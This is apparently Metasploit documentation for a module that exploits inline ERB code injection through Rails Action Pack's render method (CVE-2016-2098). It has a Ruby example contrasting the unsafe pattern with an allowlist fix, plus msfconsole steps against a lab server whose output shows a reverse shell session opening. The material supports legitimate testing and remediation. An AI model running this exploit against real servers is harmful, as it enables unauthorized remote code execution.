rails_actionpack_inline_exec is a module that exploits the render method in Action Pack.
Applications that pass unverified user input to the ```render``` method in a controller
or view may be vulnerable to code injection.
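
The pattern described above, as an added example (not code from this module or from Rails): a query string such as `id[inline]=...` is parsed into a hash, and a controller that does `render params[:id]` hands that hash straight to Action Pack, which treats the `inline` key as an ERB template. The hardened form only accepts a plain string that maps to a known template. The tiny `parse_nested_query` and the `ALLOWED_TEMPLATES` mapping are constructed for this example.

```ruby
require 'uri'

# Minimal stand-in for Rack's nested query parsing (constructed for this example,
# not Rack's code): "id[inline]=x" becomes {"id" => {"inline" => "x"}}.
def parse_nested_query(query)
  query.split('&').each_with_object({}) do |pair, params|
    key, value = pair.split('=', 2).map { |s| URI.decode_www_form_component(s.to_s) }
    if (m = key.match(/\A([^\[\]]+)\[([^\[\]]+)\]\z/))
      (params[m[1]] ||= {})[m[2]] = value
    else
      params[key] = value
    end
  end
end

# Unsafe pattern: whatever shape params["id"] arrives in is passed to render,
# so a hash like {"inline" => "<%= ... %>"} selects inline ERB rendering.
# Returned as data here rather than rendered, to show what render would receive.
def unsafe_render_options(params)
  params['id'] # in a controller this is: render params[:id]
end

# Hardened form: a string selector is looked up in a fixed allowlist; hashes,
# arrays and unknown names are rejected before anything reaches render.
ALLOWED_TEMPLATES = {
  'summary' => 'exploits/summary',
  'detail'  => 'exploits/detail',
}.freeze

def safe_render_options(params)
  id = params['id']
  raise ArgumentError, 'template selector must be a string' unless id.is_a?(String)
  template = ALLOWED_TEMPLATES.fetch(id) { raise ArgumentError, "unknown template #{id.inspect}" }
  { template: template }
end
```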

## Vulnerable Application

Action Pack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2 use unsafe dynamic rendering.

## Verification Steps

Assuming you have the right requirements to run a rails server, you can use the following fork
to set up the vulnerable server for testing:

1. Do: ```git clone https://github.com/wchen-r7/dh-CVE_2016_2098.git```
2. Do: ```bundle install```
3. Do: ```rails s -b 0.0.0.0```
4. Start msfconsole
5. Do: ```use exploit/multi/http/rails_actionpack_inline_exec```
6. Do: ```set RHOST [rails server IP]```
7. Do: ```set RPORT 3000```. 3000 is the default port for the rails server.
8. Do: ```set targeturi /exploits```
9. Configure the rest of the options (for the module or the payload)
10. Do: ```exploit```, and you should get a session:

```
msf exploit(rails_actionpack_inline_exec) > run

[*] Started reverse TCP handler on 192.168.146.1:4444
[*] Sending inline code to parameter: id
[*] Command shell session 1 opened (192.168.146.1:4444 -> 192.168.146.161:56661) at 2016-07-07 15:56:00 -0500
```

## Options

To use this module, you must manually discover the correct values for these datastore options:

**TARGETURI**

The path to a vulnerable Ruby on Rails application.

**TARGETPARAM**

The target parameter to inject with inline code.